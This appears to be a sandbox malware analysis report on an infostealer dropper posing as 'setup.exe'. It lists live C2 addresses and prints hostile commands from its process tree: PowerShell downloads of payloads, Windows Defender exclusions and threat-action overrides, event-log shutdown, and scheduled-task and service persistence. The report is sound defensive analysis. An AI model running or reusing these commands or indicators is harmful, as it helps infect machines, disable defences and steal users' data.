Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/05/2024, 00:46

General

  • Target

    setup.exe

  • Size

    704.0MB

  • MD5

    16a058c7a7cbabcedd4f1ccd59db51ff

  • SHA1

    da353a3a174dc74477927b5f6a79497e62e48d31

  • SHA256

    dfda8888baa718e15240571269d97cc427e56caac906da50fada6f1e4a001d05

  • SHA512

    fb50007bce2946a275642d0e9617a272ee71c5c3117ed3600dee94b406d3b4673f066afb6c9b456603f1b35ce8ec5bf75c8777ff8ddfedf6867ea0326d9cff96

  • SSDEEP

    98304:ijyRcZlPbzgfcG7rtUbTuen/YAajhYqCYlRMFazcwxLvLbod3+C0yKw8PWRq+s8s:4yObsfcAe9/cjhYa3M4cdJz8epZJ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443&c=1000

Extracted

Family

risepro

C2

147.45.47.93:58709

Extracted

Family

stealc

rc4.plain

Extracted

Family

vidar

Version

9.4

Botnet

ad7dbf02afc50b46afd33ddc12f41082

C2

https://steamcommunity.com/profiles/76561199680449169

https://t.me/r1g1o

Attributes
  • profile_id_v2

    ad7dbf02afc50b46afd33ddc12f41082

  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

C2

5.42.65.96:28380

Extracted

Family

amadey

Version

4.20

C2

http://193.233.132.139

Attributes
  • install_dir

    5454e6f062

  • install_file

    explorta.exe

  • strings_key

    c7a869c5ba1d72480093ec207994e2bf

  • url_paths

    /sev56rkm/index.php

rc4.plain

Extracted

Family

amadey

Version

4.18

C2

http://193.233.132.56

Attributes
  • install_dir

    09fd851a4f

  • install_file

    explorha.exe

  • strings_key

    443351145ece4966ded809641c77cfa8

  • url_paths

    /Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

lumma

C2

https://miniaturefinerninewjs.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://plaintediousidowsko.shop/api

https://sweetsquarediaslw.shop/api

https://holicisticscrarws.shop/api

https://boredimperissvieos.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect Vidar Stealer 3 IoCs
  • Detect ZGRat V1 9 IoCs
  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Modifies firewall policy service 2 TTPs 2 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 23 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 4 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 6 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 22 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 16 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    1⤵
    • Modifies firewall policy service
    • Checks computer location settings
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:5100
    • C:\Users\Admin\Documents\SimpleAdobe\rz7u8wZ2m7geFP2IusKQRQIP.exe
      C:\Users\Admin\Documents\SimpleAdobe\rz7u8wZ2m7geFP2IusKQRQIP.exe
      2⤵
      • Executes dropped EXE
      PID:1752
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Command and Scripting Interpreter: PowerShell
        PID:6988
    • C:\Users\Admin\Documents\SimpleAdobe\Ko6SGc1F2vn2SEMSaKcFkL1o.exe
      C:\Users\Admin\Documents\SimpleAdobe\Ko6SGc1F2vn2SEMSaKcFkL1o.exe
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:3864
    • C:\Users\Admin\Documents\SimpleAdobe\cixV_nkGTkopkK6M3bv5q2yU.exe
      C:\Users\Admin\Documents\SimpleAdobe\cixV_nkGTkopkK6M3bv5q2yU.exe
      2⤵
      • Modifies firewall policy service
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Drops file in System32 directory
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:1776
    • C:\Users\Admin\Documents\SimpleAdobe\upVbA4v1KvTLDndms2No_Axe.exe
      C:\Users\Admin\Documents\SimpleAdobe\upVbA4v1KvTLDndms2No_Axe.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:912
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
          PID:408
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 2192
            4⤵
            • Program crash
            PID:1148
      • C:\Users\Admin\Documents\SimpleAdobe\Pof_I6pUWTD4eui60EvOnmQb.exe
        C:\Users\Admin\Documents\SimpleAdobe\Pof_I6pUWTD4eui60EvOnmQb.exe
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • Adds Run key to start application
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • outlook_office_path
        • outlook_win_path
        PID:4876
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:5940
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:6600
        • C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\EFOewZW4hGAWK7wavcgA.exe
          "C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\EFOewZW4hGAWK7wavcgA.exe"
          3⤵
          • Executes dropped EXE
          PID:7104
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:6236
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST
          3⤵
          • Creates scheduled task(s)
          PID:6752
        • C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\NivSqBnMcATygKshf_En.exe
          "C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\NivSqBnMcATygKshf_En.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:2744
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
              PID:6968
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR" /sc HOURLY /rl HIGHEST
            3⤵
            • Creates scheduled task(s)
            PID:5724
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG" /sc ONLOGON /rl HIGHEST
            3⤵
            • Creates scheduled task(s)
            PID:6988
        • C:\Users\Admin\Documents\SimpleAdobe\7HGPq04ymPgj8MAKpQK8ZJRd.exe
          C:\Users\Admin\Documents\SimpleAdobe\7HGPq04ymPgj8MAKpQK8ZJRd.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1432
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
            • Modifies system certificate store
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4736
        • C:\Users\Admin\Documents\SimpleAdobe\PxlH0uZgx12a7zus_o6_h8xG.exe
          C:\Users\Admin\Documents\SimpleAdobe\PxlH0uZgx12a7zus_o6_h8xG.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2028
          • C:\Users\Admin\AppData\Local\Temp\is-8SP2Q.tmp\PxlH0uZgx12a7zus_o6_h8xG.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-8SP2Q.tmp\PxlH0uZgx12a7zus_o6_h8xG.tmp" /SL5="$1300E0,4216309,54272,C:\Users\Admin\Documents\SimpleAdobe\PxlH0uZgx12a7zus_o6_h8xG.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2632
            • C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe
              "C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe" -i
              4⤵
              • Executes dropped EXE
              PID:2944
            • C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe
              "C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe" -s
              4⤵
              • Executes dropped EXE
              PID:4028
        • C:\Users\Admin\Documents\SimpleAdobe\cyJLKWRMEWxiogwZ7NScLONr.exe
          C:\Users\Admin\Documents\SimpleAdobe\cyJLKWRMEWxiogwZ7NScLONr.exe
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1952
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsgC833.tmp\app.bat"
            3⤵
              PID:452
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1004
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2556
              • C:\Users\Admin\AppData\Local\Temp\i1.exe
                i1.exe /SUB=2838 /str=one
                4⤵
                • Executes dropped EXE
                PID:2392
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443&c=1000', 'i2.bat')"
                4⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:916
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K i2.bat
                4⤵
                  PID:2428
            • C:\Users\Admin\Documents\SimpleAdobe\LQqqtdauwz_TaOPIC8mm6Hjp.exe
              C:\Users\Admin\Documents\SimpleAdobe\LQqqtdauwz_TaOPIC8mm6Hjp.exe
              2⤵
              • Executes dropped EXE
              • Checks processor information in registry
              PID:3564
            • C:\Users\Admin\Documents\SimpleAdobe\yKsQAHMXBlFSnpcJZJgnuybp.exe
              C:\Users\Admin\Documents\SimpleAdobe\yKsQAHMXBlFSnpcJZJgnuybp.exe
              2⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:4544
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2520
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4572
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4396
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4972
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "RULTVSKP"
                3⤵
                • Launches sc.exe
                PID:5004
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "RULTVSKP" binpath= "C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe" start= "auto"
                3⤵
                • Launches sc.exe
                PID:4592
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                3⤵
                • Launches sc.exe
                PID:3312
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "RULTVSKP"
                3⤵
                • Launches sc.exe
                PID:2520
            • C:\Users\Admin\Documents\SimpleAdobe\oMHmKV4qin2yV3RMkuUNiFFg.exe
              C:\Users\Admin\Documents\SimpleAdobe\oMHmKV4qin2yV3RMkuUNiFFg.exe
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4140
              • C:\Users\Admin\AppData\Local\Temp\7zSC3DC.tmp\Install.exe
                .\Install.exe
                3⤵
                • Executes dropped EXE
                PID:2468
                • C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe
                  .\Install.exe /ddidy "525403" /S
                  4⤵
                  • Checks BIOS information in registry
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Enumerates system info in registry
                  PID:4388
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                      PID:1464
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                        6⤵
                          PID:3812
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            7⤵
                              PID:912
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                8⤵
                                  PID:2476
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                              6⤵
                                PID:2576
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  7⤵
                                    PID:5052
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                      8⤵
                                        PID:4108
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                    6⤵
                                      PID:3380
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                        7⤵
                                          PID:3312
                                          • \??\c:\windows\SysWOW64\reg.exe
                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                            8⤵
                                              PID:4932
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                          6⤵
                                            PID:3776
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                              7⤵
                                                PID:4272
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                  8⤵
                                                    PID:2764
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                6⤵
                                                  PID:1488
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                    7⤵
                                                      PID:2488
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                        8⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2820
                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                          9⤵
                                                            PID:3380
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                    5⤵
                                                      PID:3052
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                        6⤵
                                                          PID:8
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            7⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3464
                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                              8⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4376
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:51:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe\" LY /nlfdidcOwS 525403 /S" /V1 /F
                                                        5⤵
                                                        • Drops file in Windows directory
                                                        • Creates scheduled task(s)
                                                        PID:5308
                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                                                        5⤵
                                                          PID:6128
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                                            6⤵
                                                              PID:6208
                                                              • \??\c:\windows\SysWOW64\schtasks.exe
                                                                schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                                                                7⤵
                                                                  PID:6820
                                                      • C:\Users\Admin\Documents\SimpleAdobe\2MEnKpVWLRc5SpDj8qnnOcHN.exe
                                                        C:\Users\Admin\Documents\SimpleAdobe\2MEnKpVWLRc5SpDj8qnnOcHN.exe
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of SetThreadContext
                                                        PID:4756
                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                          C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
                                                          3⤵
                                                          • Blocklisted process makes network request
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:4664
                                                      • C:\Users\Admin\Documents\SimpleAdobe\LPlVCrUtq4IcBRge6e7zsGdp.exe
                                                        C:\Users\Admin\Documents\SimpleAdobe\LPlVCrUtq4IcBRge6e7zsGdp.exe
                                                        2⤵
                                                        • Checks computer location settings
                                                        • Drops startup file
                                                        • Executes dropped EXE
                                                        • Accesses Microsoft Outlook profiles
                                                        • Adds Run key to start application
                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                        • Checks processor information in registry
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of SetWindowsHookEx
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2180
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:3504
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:4588
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 HR" /sc HOURLY /rl HIGHEST
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:4756
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_ab414e7959b5772c8d538ffeee266027 LG" /sc ONLOGON /rl HIGHEST
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:1508
                                                        • C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\DzvelfwNBvxbZcdOhY3K.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\spanSuwZkaeFyeun\DzvelfwNBvxbZcdOhY3K.exe"
                                                          3⤵
                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                          • Checks BIOS information in registry
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Checks whether UAC is enabled
                                                          • Drops file in Windows directory
                                                          PID:3840
                                                          • C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"
                                                            4⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Checks computer location settings
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Checks whether UAC is enabled
                                                            PID:4620
